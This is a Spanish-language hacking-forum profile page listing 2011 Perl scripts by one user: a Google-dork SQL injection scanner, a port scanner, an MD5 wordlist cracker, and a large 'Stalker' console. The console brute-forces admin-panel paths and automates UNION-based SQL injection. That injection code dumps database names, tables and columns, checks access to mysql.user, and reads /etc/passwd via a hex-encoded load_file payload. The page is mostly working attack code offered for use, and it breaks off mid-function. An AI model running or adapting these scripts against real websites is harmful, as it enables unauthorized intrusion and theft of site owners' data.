Una forma mas facil de instalar modulos de perl en windows es usar el comando ppm install
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#502
Scripting / [Perl] Search in google for scan SQLI
7 Octubre 2011, 15:57 PM
Un simple scanner de SQLI para usar en google
Código (perl) [Seleccionar]
#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011
use LWP::UserAgent;
use HTML::LinkExtor;
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
copyright();
<stdin>;
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}
my @founds = repes(@founds);
return @founds;
}
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
}}
sub get_links {
$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}
sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}
sub head {
print "\n\n-- == Search Google == --\n\n";
}
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}
sub toma {
return $nave->get($_[0])->content;
}
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ? #503
Scripting / [Perl] Scan Port By Doddy H
7 Octubre 2011, 15:56 PM
HOla a todos aca les traigo un simple scanner de puertos
hecho en perl
Ejemplo de uso
hecho en perl
Código (perl) [Seleccionar]
#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos
use IO::Socket;
head();
unless($ARGV[0]) {
print "\n\n[sintax] : ".$0." <ip> \n\n";
} else {
scan($ARGV[0]);
}
copyright();
sub scan {
my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);
print "\n[+] Scanning $_[0]\n\n\n";
for my $port(keys %ports) {
if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
}
sub head {
print "\n\n-- == Scan Port == --\n\n";
}
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}
Ejemplo de uso
Código [Seleccionar]
perl scan.pl localhost
#504
Scripting / [Perl] Search MD5
7 Octubre 2011, 15:56 PM
Hola a todos
HOy acabo de hacer un crackeador de hash md5 con salto o sin el
En esta version es con ventanas usandos tk
HOy acabo de hacer un crackeador de hash md5 con salto o sin el
En esta version es con ventanas usandos tk
Código (perl) [Seleccionar]
#Search MD5
#Version : Tk
#Author : Doddy Hackman
use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;
if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}
my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);
sub oper{
$w->update;
$browse = $w->FileSelect(-directory => "/");
my $file = $browse->Show;
$o->configure (-text =>$file);
}
sub about {
my $venta = MainWindow->new(-background=>"black");
$venta->geometry("300x180+20+20");
$venta->title("About");
$venta->resizable(0,0);
$venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack();
$venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack()
}
sub crack {
my $hash = $hash->get;
my $salt = $salt->get;
my $wordlist = $o->get;
my $console = MainWindow->new(-background=>"black");
$console->title("Status");
$console->resizable(0,0);
$console->geometry("400x320+20+20");
$console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
$console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);
if ($salt eq "X") { $salt = "";}
unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;}
if(length($hash)==32) {
$box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");
open word,$wordlist;
@words = <word>;
close word;
for my $pass(@words) {
chomp $pass;
$console->update;
$box->insert('end',"[+] Trying with $pass\n");
$digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest;
if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last;}
}} else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;}
unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}}
MainLoop;
#505
Scripting / [Perl] Stalker By Doddy H
7 Octubre 2011, 15:56 PM
Bueno aca les traigo un programa que eh estado
haciendo esta ultima semana
Se llama stalker , sirve como consola en caso de que cmd.exe no este
disponible y tiene las siguiente funciones
haciendo esta ultima semana
Se llama stalker , sirve como consola en caso de que cmd.exe no este
disponible y tiene las siguiente funciones
- Mostrar IP de servidor especifico
- Capturar todos los links de una pagina
- Recibir procesos de nuestra maquina
- Cerrar el proceso que nos moleste
- Conectar a un servidor y mostrar respuesta
- Capturar metodos HTTP de un servidor web
- Verificar listado de directorios en una pagina
- Codificacion y decodificacion de hex/ascii/base64
- Escanear puertos de una IP
- Buscar panel de administracion
- Crackear hash md5 mediante webs
- Buscar en google paginas vulnerables a SQLI
- Cliente FTP
- Navegador por nuestros archivos y directorios
- Y ejecutar comandosCódigo (perl) [Seleccionar]
#!usr/bin/perl
#Project STALKER (C) Doddy Hackman 2011
#
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#
#You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
#
use IO::Socket;
use HTML::LinkExtor;
use LWP::UserAgent;
use Win32::OLE qw(in);
use Win32::Process;
use Net::FTP;
use Cwd;
use URI::Split qw(uri_split);
use MIME::Base64;
use DBI;
use Color::Output;
Color::Output::Init
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');
unless (-d "/logs/webs") {
mkdir("logs/",777);
mkdir("logs/webs/",777);
}
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
getinfo();
$SIG{INT} = \&next;
while(1) {
cprint "\x037"; #13
menujo();
cprint "\x030";
}
sub getinfo {
$so = $^O;
$login = Win32::LoginName();
$domain = Win32::DomainName();
cprint "\x0313"; #13
print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
cprint "\x030";
}
sub menujo {
print "\n\n>";
chomp (my $cmd = <stdin>);
print "\n\n";
if ($cmd=~/getinfo/ig) {
getinfo();
}
elsif ($cmd =~/getip (.*)/) {
my $te = $1;
if ($te eq "" or $te eq " ") {
print "\n[+] sintax : getip <host>\n";
}
print "\n[IP] : ".getip($1)."\n";
print "\n";
}
elsif ($cmd =~/getlink (.*)/) {
print "[+] Extracting links in the page\n\n\n";
$code = toma($1);
my @re = get_links($code);
for my $url(@re) {
chomp $url;
print "[Link] : $url\n";
}
print "\n\n[+] Finish\n";
}
elsif ($cmd=~/help/) {
helpme();
}
elsif ($cmd=~/getprocess/) {
my %re = getprocess();
for my $data(keys %re) {
($proceso,$pid) = ($t=~/(.*):(.*)/ig);
print "[+] Proceso : ".$data."\n";
print "[+] PID : ".$re{$data}."\n\n";
}
}
elsif ($cmd=~/killprocess (.*) (.*)/) {
if (killprocess($1,$2)) {
print "[+] Process $1 closed";
}
}
elsif ($cmd=~/conec (.*) (.*) (.*)/) {
print conectar($1,$2,$3);
}
elsif ($cmd=~/allow (.*)/) {
$re = conectar($1,"80","GET / HTTP/1.0\r\n");
if ($re=~/Allow:(.*)/ig) {
print "[+] Metodos : ".$1."\n";
}}
elsif ($cmd=~/paths (.*)/) {
scanpaths($1);
}
elsif ($cmd=~/encodehex (.*)/) {
print "\n\n[+] ".hex_en($1)."\n\n";
}
elsif ($cmd=~/decodehex (.*)/) {
print "\n\n[+] ".hex_de($1)."\n\n";
}
elsif ($cmd=~/download (.*) (.*)/) {
my $file,$name = $1,$2;
if (download($1,$2)) {
print "[+] File downloaded\n";
}
}
elsif ($cmd=~/encodeascii (.*)/) {
print "\n\n[+] ".ascii($1)."\n\n";
}
elsif ($cmd=~/decodeascii (.*)/) {
print "\n\n[+] ".ascii_de($1)."\n\n";
}
elsif ($cmd=~/encodebase (.*)/) {
print "\n\n[+] ".base($1)."\n\n";
}
elsif ($cmd=~/decodebase (.*)/) {
print "\n\n[+] ".base_de($1)."\n\n";
}
elsif ($cmd=~/aboutme/) {
aboutme();
}
elsif ($cmd=~/scanport (.*)/) {
scanport($1);
}
elsif ($cmd=~/panel (.*)/) {
scanpanel($1);
}
elsif ($cmd=~/scangoogle/) {
print "[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
}
elsif ($cmd=~/getpass (.*)/) {
crackit($1);
}
elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
ftp($1,$2,$3);
}
elsif ($cmd=~/navegator/) {
nave:
print getcwd().">";
chomp(my $rta = <stdin>);
print "\n\n";
if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n";
} else {
print "[Directory] : ".$_."\n";
}}}
if ($rta=~/cd (.*)/) {
my $dir = $1;
if (chdir($dir)) {
print "\n[+] Directory changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/del (.*)/) {
my $file = getcwd()."/".$1;
if (-f $file) {
if (unlink($file)) {
print "\n[+] File Deleted\n";
} else {
print "\n[-] Error\n";
}
} else {
if (rmdir($file)) {
print "\n[+] Directory Deleted\n";
} else {
print "\n[-] Error\n";
}}}
if ($rta=~/rename (.*) (.*)/) {
if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
print "\n[+] File Changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/open (.*)/) {
my $file = $1;
chomp $file;
system($file);
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open exit\n\n";
}
if ($rta=~/exit/) {
next;
}
print "\n\n";
goto nave;
}
elsif ($cmd=~/kobra (.*)/) {
my $url = $1;
chomp $url;
scansqli($url,"--");
}
elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
enter($1,$2,$3);
}
elsif ($cmd=~/exit/) {
copyright();
<stdin>;
exit(1);
}
else {
system($cmd);
}
#print "\n\n";
}
sub scansqli {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
menujo();
}
}
sub length {
my $rows = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
$code = toma($inyection);
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
unless ($testar1 eq $testar2) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}}}}}
sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n";
my ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}}}
sub menu_options {
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
print "\n/logs/webs/$save>";
chomp (my $rta = <stdin>);
if ($rta=~/help/) {
print qq(
commands : details tables columns dbs othertable othercolumn
mysqluser dumper logs exit
);
}
if ($rta =~/tables/) {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/columns (.*)/) {
my $tabla = $1;
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($rta =~/dbs/) {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/othertable (.*)/) {
my $data = $1;
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($rta =~/othercolumn (.*) (.*)/){
my ($db,$table) = ($1,$2);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($rta =~/mysqluser/) {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($rta=~/logs/) {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($rta=~/exit/) {
next;
}
elsif ($rta=~/dumper (.*) (.*) (.*)/) {
my ($tabla,$col1,$col2) = ($1,$2,$3);
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($rta =~/details/) {
&details($_[0],$_[1],$save);
&reload;
}
else {
&reload;
}
}
sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length : $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length : $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}
}
sub reload {
&menu_options($_[0]);
}
sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}
sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
print "\n";
} else {
print "[-] information_schema = ERROR\n";
}
}
sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[+] Tables Length : $1\n\n";
savefile($_[3].".txt","[+] Tables Length : $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
print "\n";
} else {
print "\n[-] information_schema = ERROR\n";
}}
sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
